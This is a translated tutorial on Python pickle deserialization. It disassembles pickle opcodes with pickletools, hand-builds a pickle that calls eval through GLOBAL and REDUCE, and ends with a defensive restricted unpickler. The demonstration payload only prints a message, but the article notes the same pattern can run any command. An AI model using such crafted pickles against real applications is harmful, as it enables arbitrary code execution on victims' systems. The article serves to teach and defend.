Dangerous pickles - malicious serialization in Python

Original author: Evan Sangaline

Panta rhei: the launch of the updated "Python Web Developer" course is approaching, and we still have material that we found very interesting and want to share with you.

Why are pickles dangerous?
Those pickles are extremely dangerous. I can't even begin to explain how dangerous. Just trust me. It's important, okay?
- "Explosive Disorder" by Pan Telare

Before diving into the opcodes, let's cover the basics. The Python standard library has a module called pickle, which is used to serialize and deserialize objects. Except that it is not called serialization and deserialization there, but pickling and unpickling.

As a person who still suffers from nightmares after using Boost Serialization in C++, I can say that pickle is excellent. Whatever you throw at it, it continues to Just Work. And not only with builtin types: in most cases, you can serialize your own classes without writing any serialization boilerplate. Even objects such as recursive data structures (which would cause a crash when using the similar marshal module) are no problem.

Here is a quick example for those who are not familiar with the pickle module:

import pickle
# start with any instance of a Python type
original = { 'a': 0, 'b': [1, 2, 3] }
# turn it into a byte string
pickled = pickle.dumps(original)
# turn it back into an identical object
identical = pickle.loads(pickled)
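The recursive case mentioned above can be checked the same way. This is only a minimal sketch; the names `recursive` and `restored` are made up for illustration.

```python
import pickle

# A list that contains itself: a small recursive data structure.
recursive = [1, 2]
recursive.append(recursive)

restored = pickle.loads(pickle.dumps(recursive))

# The copy is a new list whose last element is the copy itself,
# so the self-reference survives the round trip.
print(restored[:2])
print(restored[2] is restored)
```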

This is sufficient in most cases. Pickle is really cool... but somewhere in its depths, darkness is hiding.

One of the first lines of the pickle module documentation says:
Warning: The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

I have read this warning many times and often wondered what malicious data might look like. Recently, I decided it was time to find out. And it was worth it.
My quest to create malicious data taught me a lot about how the pickle protocol works, showed me some cool methods for debugging pickles, and turned up a couple of cheeky comments in the Python source code. If you keep reading, you will get the same benefits (and soon you too will be sending people your own malicious pickle files). Warning: there will be technical details. The only prerequisite is basic knowledge of Python, but a passing familiarity with assembly will not hurt.

Fake Pickle Bomb

I started by reading the pickle module documentation, hoping to find tips on how to become an elite hacker, and came across this line:
The pickletools module contains tools for analyzing data streams generated by pickle. The pickletools source code has extensive comments about opcodes used by pickle protocols.

Opcodes? I did not expect the implementation of pickle to look like this:

def dumps(obj):
    return obj.__repr__()
def loads(pickled):
    # Warning: The pickle module is not secure...
    return eval(pickled)

But I also did not expect it to define its own low-level language. Fortunately, the second part of that line is telling the truth: the pickletools module is very helpful for understanding how the protocols work. Plus, the comments in the code turned out to be very funny.

Take, for example, the question of which protocol version to focus on. There are five in total in Python 3.6, numbered from 0 to 4. Protocol 0 is the obvious choice because the documentation calls it "human-readable", and the pickletools source code offers additional information:

Pickle opcodes never go away, not even when better ways to do a thing get invented. The repertoire of the PM just keeps growing over time ... "Opcode bloat" isn't so much a subtle problem as a source of wearying complication.

It turns out that each new protocol is a superset of the previous one. Even setting aside that protocol 0 is "human-readable" (which hardly matters, since we are going to disassemble the instructions anyway), it also has the smallest number of possible opcodes. That makes it ideal if the goal is to understand how malicious pickle files are built.

If the talk of opcodes is confusing, do not worry. For now we will return to Python, and later I will explain in detail how opcodes relate to Python code. Let's create a simple Python class, no opcodes involved.

class Bomb:
    def __init__(self, name):
        self.name = name
    def __getstate__(self):
        return self.name
    def __setstate__(self, state):
        self.name = state
        print(f'Bang! From, {self.name}.')
bomb = Bomb('Evan')

The __setstate__() and __getstate__() methods are used by the pickle module to serialize and deserialize classes. Often you do not need to define them yourself, because the default implementations simply serialize the instance's __dict__. As you can see, I defined them explicitly here to hide a little surprise at the moment the Bomb object is deserialized.

Let's check that the deserialization code with the surprise works. We can pickle and unpickle the object using:
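To see the difference between the default state and a custom one without pickling anything, one option is to ask an object what it would hand to pickle. The sketch below assumes `__reduce_ex__(0)` as the inspection point (it is the hook pickle consults for protocol 0); the classes `Plain` and `Custom` are hypothetical and exist only for this illustration.

```python
import copyreg

class Plain:
    """No custom state methods: the instance __dict__ is used as the state."""
    def __init__(self, name):
        self.name = name

class Custom(Plain):
    """Custom state methods: only the name string is stored."""
    def __getstate__(self):
        return self.name
    def __setstate__(self, state):
        self.name = state

# __reduce_ex__(0) returns (callable, arguments for the callable, state).
plain_func, plain_args, plain_state = Plain('Evan').__reduce_ex__(0)
custom_func, custom_args, custom_state = Custom('Evan').__reduce_ex__(0)

print(plain_state)   # {'name': 'Evan'}
print(custom_state)  # Evan
```

In both cases the callable is `copyreg._reconstructor`, a name that reappears once the pickle is disassembled.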

import pickle
pickled_bomb = pickle.dumps(bomb, protocol=0)
unpickled_bomb = pickle.loads(pickled_bomb)

We get:

Bang! From, Evan.

Exactly according to plan! There is only one problem: if we try to unpickle the pickled_bomb string in a context where Bomb is not defined, nothing will work. Instead, an error appears:

AttributeError: Can't get attribute 'Bomb' on 

It turns out that we can run our custom __setstate__() method only if the unpickling context already has access to the code with our malicious print statement. And if we already have access to the code the victim runs, why bother with pickle at all? We could simply put malicious code in any other method the victim will use. That is completely true; I just wanted to demonstrate the point.

After all, it is not unreasonable to suspect that Python might support pickling the bytecode of an object's deserialization method. For example, the marshal module can serialize methods, and many pickle alternatives, such as marshmallow, dill, and pyro, also support function serialization.

However, that is not what the ominous warning in the pickle documentation is about. We need to dive a little deeper to find out where the dangers of deserialization lie.

Decompiling Pickle

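It is time to try to understand how pickling really works. Let's start by looking at the object from the previous section, pickled_bomb:

b'ccopy_reg\n_reconstructor\np0\n(c__main__\nBomb\np1\nc__builtin__\nobject\np2\nNtp3\nRp4\nVEvan\np5\nb.'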

Wait... we used protocol 0, right? And this is the "human-readable" one?

But that's okay: in the pickletools source code we should find "extensive comments about opcodes used by pickle protocols". They should help us sort this out!

I'm despairing of documenting this accurately and comprehensibly -- you really have to read the pickle code to find all the special cases.
- Comment in the pickletools source code

Oh god. What have we gotten ourselves into?

Just kidding, the pickletools source code really is very well commented. And the tools themselves are no less useful. For example, there is a function for disassembling a pickle called pickletools.dis(). It will help translate our pickle into a more understandable language.

To disassemble our pickled_bomb string, simply run the following:

import pickletools
pickletools.dis(pickled_bomb)

As a result, we get:
    0: c    GLOBAL     'copy_reg _reconstructor'
   25: p    PUT        0
   28: (    MARK
   29: c        GLOBAL     '__main__ Bomb'
   44: p        PUT        1
   47: c        GLOBAL     '__builtin__ object'
   67: p        PUT        2
   70: N        NONE
   71: t        TUPLE      (MARK at 28)
   72: p    PUT        3
   75: R    REDUCE
   76: p    PUT        4
   79: V    UNICODE    'Evan'
   85: p    PUT        5
   88: b    BUILD
   89: .    STOP
highest protocol among opcodes = 0

If you have dealt with languages like x86, Dalvik, or CLR, then all of the above may look familiar. But even if you have not, it is not a problem; we will take it step by step. For now, it is enough to know that the uppercase words like GLOBAL, PUT, and MARK are opcodes, instructions that are interpreted much like functions in higher-level languages. Everything to their right is the arguments of those functions, and to the left is how they were encoded in the original "human-readable" string.
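The same three columns (position, one-character code, opcode name with its argument) can also be read programmatically with pickletools.genops(), which decodes the stream without executing it. A minimal sketch, using the small dictionary from the first example rather than the bomb; the `rows` list is just an illustrative name.

```python
import pickle
import pickletools

original = {'a': 0, 'b': [1, 2, 3]}
data = pickle.dumps(original, protocol=0)

# genops() yields (opcode info, decoded argument, byte position) triples.
rows = [(pos, opcode.code, opcode.name, arg)
        for opcode, arg, pos in pickletools.genops(data)]

for pos, code, name, arg in rows:
    print(f'{pos:5}: {code}    {name:<10} {arg!r}')
```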

But before starting the step-by-step analysis, let's introduce one more useful thing from pickletools: pickletools.optimize(). This function removes unused opcodes from a pickle. The output is a simplified but equivalent pickle. We can disassemble the optimized version of pickled_bomb by running the following:

pickled_bomb = pickletools.optimize(pickled_bomb)
pickletools.dis(pickled_bomb)

And we get a simplified version of a series of instructions:

    0: c    GLOBAL     'copy_reg _reconstructor'
   25: (    MARK
   26: c        GLOBAL     '__main__ Bomb'
   41: c        GLOBAL     '__builtin__ object'
   61: N        NONE
   62: t        TUPLE      (MARK at 25)
   63: R    REDUCE
   64: V    UNICODE    'Evan'
   70: b    BUILD
   71: .    STOP
highest protocol among opcodes = 0

You may notice that this differs from the original only in that all the PUT opcodes are gone. That leaves us with 10 instructions to understand. Soon we will go through them one by one and manually "decompile" them into Python code.

During unpickling, opcodes are interpreted by an entity called the Pickle Machine (PM). Each pickle is a program running on the PM, much like compiled Java code runs on the Java Virtual Machine (JVM). To decompile our pickle, we need to understand how the PM works.

The PM has two areas for storing data and interacting with it: the memo and the stack. The memo is meant for long-term storage and is similar to a Python dictionary mapping integers to objects. The stack is like a Python list that many operations interact with by pushing things onto it and popping them off. We can emulate these data areas in Python as follows:
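The effect of pickletools.optimize() can be checked on any protocol 0 pickle. The sketch below uses the small dictionary from the first example; the helper `opcode_names` is a hypothetical convenience, not part of pickletools.

```python
import pickle
import pickletools

original = {'a': 0, 'b': [1, 2, 3]}
raw = pickle.dumps(original, protocol=0)
slim = pickletools.optimize(raw)

def opcode_names(data):
    """List the opcode names in a pickle without executing it."""
    return [opcode.name for opcode, _, _ in pickletools.genops(data)]

print('PUT' in opcode_names(raw))    # PUT opcodes are present before optimizing
print('PUT' in opcode_names(slim))   # and absent afterwards
print(pickle.loads(slim) == original)
```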

# the PM's long-term memory/storage
memo = {}
# the PM's stack, which most opcodes interact with
stack = []

During unpickling, the PM reads the pickle program and executes each instruction in sequence. It terminates when it reaches the STOP opcode; whatever object is on top of the stack at that point is the final result of unpickling. Using our emulated memo and stack, let's try translating our pickle into Python... instruction by instruction.

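  • GLOBAL pushes a class or function onto the stack, given the module and name as arguments. Note that the output is a bit misleading, because in Python 3 copy_reg was renamed to copyreg.

    # Push a global object (module.attr) onto the stack.
    #  0: c    GLOBAL     'copy_reg _reconstructor'
    from copyreg import _reconstructor
    stack.append(_reconstructor)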

  • MARK pushes a special markobject onto the stack so that we can later use it to delimit a section of the stack. We will use the string 'MARK' to represent the markobject.

    # Push the markobject onto the stack.
    # 25: (    MARK
    stack.append('MARK')

  • GLOBAL again. But this time with the __main__ module, so we do not need to import anything.

    # Push a global object (module.attr) onto the stack.
    # 26: c        GLOBAL     '__main__ Bomb'
    stack.append(Bomb)

  • GLOBAL again. And we do not need to import object explicitly either.

    # Push a global object (module.attr) onto the stack.
    # 41: c        GLOBAL     '__builtin__ object'
    stack.append(object)

  • NONE just pushes None onto the stack.

    # Push None onto the stack.
    # 61: N        NONE
    stack.append(None)

  • TUPLE is a little trickier. Remember how we pushed 'MARK' onto the stack earlier? This operation collects everything on the stack after 'MARK' into a tuple. It then removes 'MARK' and puts the tuple in its place.

    # Build a tuple out of the topmost stack slice, after the markobject.
    # 62: t        TUPLE      (MARK at 25)
    last_mark_index = len(stack) - 1 - stack[::-1].index('MARK')
    mark_tuple = tuple(stack[last_mark_index + 1:])
    stack = stack[:last_mark_index] + [mark_tuple]

    It is useful to see how this transforms the stack.

    # the stack before the TUPLE operation:
    [<function copyreg._reconstructor>, 'MARK', __main__.Bomb, object, None]
    # the stack after the TUPLE operation:
    [<function copyreg._reconstructor>, (__main__.Bomb, object, None)]

  • REDUCE pops the last two things off the stack. It then calls the second-to-last one, unpacking the last one as its positional arguments, and pushes the result onto the stack. It is hard to explain in words, but it is clear in code.

    # Push an object built from a callable and an argument tuple.
    # 63: R    REDUCE
    args = stack.pop()
    callable = stack.pop()
    stack.append(callable(*args))

  • UNICODE just pushes a Unicode string onto the stack (a very good Unicode string, by the way!).

    # Push a Python Unicode string object.
    # 64: V    UNICODE    'Evan'
    stack.append('Evan')

  • BUILD pops the last object off the stack and then passes it as the argument to __setstate__() on the new last thing on the stack.

    # Finish building an object, via __setstate__ or a dict update.
    # 70: b    BUILD
    arg = stack.pop()
    stack[-1].__setstate__(arg)

  • STOP simply means that whatever is on top of the stack is our final result.

    # Stop the PM.
    # 71: .    STOP
    unpickled_bomb = stack[-1]

Phew, we're done! Not sure our code is especially Pythonic... but it does emulate the PM. You may notice that we never used the memo. Remember all those PUT opcodes that pickletools.optimize() removed? They would have interacted with the memo, but in our simple example it was not needed.

Let's try to simplify the code to show more clearly what it does. In fact, apart from shuffling data around, there are only three operations: importing _reconstructor in instruction 1, calling _reconstructor in instruction 7, and calling __setstate__() in instruction 9. If you do the data shuffling in your head, everything can be expressed in three lines of Python.
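The walkthrough above can be collected into one small interpreter. This is only a sketch of the handful of protocol 0 opcodes seen so far, plus PUT and its counterpart GET so the memo gets some use; it is not how the real unpickler is implemented. The names `run_pm`, `read_line`, and `PY2_MODULE_NAMES` are made up for illustration, strings are assumed to be plain ASCII, and BUILD assumes the object defines __setstate__(). Like pickle.loads(), it calls whatever the pickle tells it to call, so it should only be fed data you wrote yourself.

```python
import importlib

# Old Python 2 module names that protocol 0 pickles still use (assumed subset).
PY2_MODULE_NAMES = {'copy_reg': 'copyreg', '__builtin__': 'builtins'}
MARK = object()  # stand-in for the PM's markobject

def read_line(data, pos):
    """Return the newline-terminated argument starting at pos, and the next position."""
    end = data.index(b'\n', pos)
    return data[pos:end].decode('ascii'), end + 1

def run_pm(data):
    """Execute a tiny subset of protocol 0 opcodes and return the top of the stack."""
    memo, stack, pos = {}, [], 0
    while True:
        op, pos = data[pos:pos + 1], pos + 1
        if op == b'c':    # GLOBAL: push module.attr
            module, pos = read_line(data, pos)
            name, pos = read_line(data, pos)
            module = PY2_MODULE_NAMES.get(module, module)
            stack.append(getattr(importlib.import_module(module), name))
        elif op == b'(':  # MARK
            stack.append(MARK)
        elif op == b'N':  # NONE
            stack.append(None)
        elif op == b'V':  # UNICODE
            text, pos = read_line(data, pos)
            stack.append(text)
        elif op == b't':  # TUPLE: everything after the last MARK
            start = len(stack) - 1 - stack[::-1].index(MARK)
            stack[start:] = [tuple(stack[start + 1:])]
        elif op == b'R':  # REDUCE: call callable(*args)
            args = stack.pop()
            func = stack.pop()
            stack.append(func(*args))
        elif op == b'b':  # BUILD: hand the state to __setstate__
            state = stack.pop()
            stack[-1].__setstate__(state)
        elif op == b'p':  # PUT: remember the top of the stack in the memo
            key, pos = read_line(data, pos)
            memo[int(key)] = stack[-1]
        elif op == b'g':  # GET: push a remembered object again
            key, pos = read_line(data, pos)
            stack.append(memo[int(key)])
        elif op == b'.':  # STOP
            return stack[-1]
        else:
            raise ValueError(f'unsupported opcode {op!r} at position {pos - 1}')

# A harmless hand-written pickle: call len('abc').
print(run_pm(b'c__builtin__\nlen\n(Vabc\ntR.'))
# A hand-written pickle that stores a string in the memo and reuses it twice.
print(run_pm(b'Vhi\np0\n(g0\ng0\nt.'))
```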

# Instruction 1, where `_reconstructor` was imported
from copyreg import _reconstructor
# Instruction 7, where `_reconstructor` was called
unpickled_bomb = _reconstructor(cls=Bomb, base=object, state=None)
# Instruction 9, where `__setstate__` was called
unpickled_bomb.__setstate__('Evan')

A look inside the source code of copyreg._reconstructor() reveals that we are simply calling object.__new__(Bomb). Using this knowledge, we can simplify everything down to two lines.

unpickled_bomb = object.__new__(Bomb)
unpickled_bomb.__setstate__('Evan')

Congratulations, you just decompiled a pickle!

A Real Pickle Bomb

I am not a pickle expert, but I can already see how to construct a malicious pickle. We can use the GLOBAL opcode to import any function; os.system and __builtin__.eval seem like suitable candidates. Then we use REDUCE to call it with an arbitrary argument. But wait... what is this?

If not isinstance(callable, type), REDUCE complains unless the callable has been registered with the copyreg module's safe_constructors dict, or the callable has a magic '__safe_for_unpickling__' attribute with a true value. I'm not sure why it does this, but I've sure seen this complaint often enough when I didn't want to <wink>.

A wink right back. The pickletools documentation seems to suggest that REDUCE can only call allowed callables. For a moment this had me worried, but a search for "safe_constructors" quickly turned up PEP 307 from 2003.

In previous versions of Python, unpickling would do a "safety check" on certain operations, refusing to call functions or constructors that weren't marked as "safe for unpickling" by either having an attribute __safe_for_unpickling__ set to 1, or by being registered in a global registry, copy_reg.safe_constructors.

This feature gives a false sense of security: nobody has ever done the necessary, extensive, code audit to prove that unpickling untrusted pickles cannot invoke unwanted code, and in fact bugs in the Python 2.2 pickle.py module make it easy to circumvent these security measures.

We firmly believe that, on the Internet, it is better to know that you are using an insecure protocol than to trust a protocol to be secure whose implementation hasn't been thoroughly checked. Even high quality implementations of widely used protocols are routinely found flawed; Python's pickle implementation simply cannot make such guarantees without a much larger time investment. Therefore, as of Python 2.3, all safety checks on unpickling are officially removed, and replaced with this warning:
Warning: Do not unpickle data received from an untrusted or unauthenticated source.

Hello, darkness, our old friend. This is where it all began.

So that's it: we have found the key ingredient, and there is no false sense of security standing in the way of what we plan to do. Let's start by writing our bomb:

# push a function onto the stack to execute arbitrary Python
GLOBAL     '__builtin__ eval'
# mark the start of our argument tuple
MARK
    # push the Python code that we want to execute onto the stack
    UNICODE    'print("Bang! From, Evan.")'
    # wrap the code in a tuple so that REDUCE can unpack it
    TUPLE
# call `eval()` with our Python code as the argument
REDUCE
# use STOP to make the PM code valid
STOP

To turn this into a real pickle, we need to replace each opcode with its corresponding ASCII code: c for GLOBAL, ( for MARK, V for UNICODE, t for TUPLE, R for REDUCE, and . for STOP. Note that these are the same values that appeared to the left of the opcodes in the pickletools.dis() output earlier. Arguments are parsed using a combination of position and newline delimiting: each argument starts either immediately after its opcode or after the previous argument, and is read until a newline character is found. The pickle code then looks as follows:

c__builtin__
eval
(Vprint("Bang! From, Evan.")
tR.
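The opcode-to-byte substitution can also be done in code. The sketch below relies on the opcode constants that the pickle module itself exposes (pickle.GLOBAL, pickle.MARK, and so on); the names `payload`, `pieces`, and `assembled` are illustrative. It only assembles and disassembles the pickle and never loads it, so nothing is executed.

```python
import pickle
import pickletools

payload = 'print("Bang! From, Evan.")'

# One entry per instruction: the opcode byte followed by its
# newline-terminated arguments, if it takes any.
pieces = [
    pickle.GLOBAL + b'__builtin__\n' + b'eval\n',
    pickle.MARK,
    pickle.UNICODE + payload.encode('ascii') + b'\n',
    pickle.TUPLE,
    pickle.REDUCE,
    pickle.STOP,
]
assembled = b''.join(pieces)

print(assembled)
# dis() decodes the stream without calling anything in it.
pickletools.dis(assembled)
```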

Finally, we can verify this:

# Run me at home!
# I'm safe, I promise!
pickled_bomb = b'c__builtin__\neval\n(Vprint("Bang! From, Evan.")\ntR.'
pickle.loads(pickled_bomb)

And...

Bang! From, Evan.

I know that you have no reason to believe me, but it really did work on the first try.
It is easy to see that anyone could come up with a more malicious argument for eval(). The PM can be made to do literally anything that Python code can do, including running system commands through os.system().
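For completeness, the pickle documentation describes one way to narrow what GLOBAL may import: subclass pickle.Unpickler and override find_class(). The sketch below follows that documented pattern; the allow-list `ALLOWED_BUILTINS` and the names `RestrictedUnpickler` and `restricted_loads` are choices made for this illustration, and this reduces the attack surface rather than making untrusted pickles safe.

```python
import builtins
import io
import pickle

# Assumption: only these harmless builtins may be referenced by a pickle.
ALLOWED_BUILTINS = {'range', 'complex', 'set', 'frozenset', 'slice'}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the pickle asks for.
        if module == 'builtins' and name in ALLOWED_BUILTINS:
            return getattr(builtins, name)
        # Everything else, including '__builtin__ eval', is refused.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(data):
    """Like pickle.loads(), but with the restricted find_class()."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

# Ordinary data still loads.
print(restricted_loads(pickle.dumps([1, 2, range(3)])))

# The bomb is rejected before eval() is ever looked up.
bomb = b'c__builtin__\neval\n(Vprint("Bang! From, Evan.")\ntR.'
try:
    restricted_loads(bomb)
except pickle.UnpicklingError as error:
    print('refused:', error)
```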

All good things come to an end.

I set out to learn how to make a dangerous pickle, and in the process accidentally came to understand how pickles work. I admit, I enjoyed digging into the Pickle Machine. The pickletools source code helped a lot, and I recommend it if you are interested in learning more about the pickle protocol and the PM.


As always, we look forward to your comments and questions, which you can ask here or put to Ilya Lebedev in person at the open day.
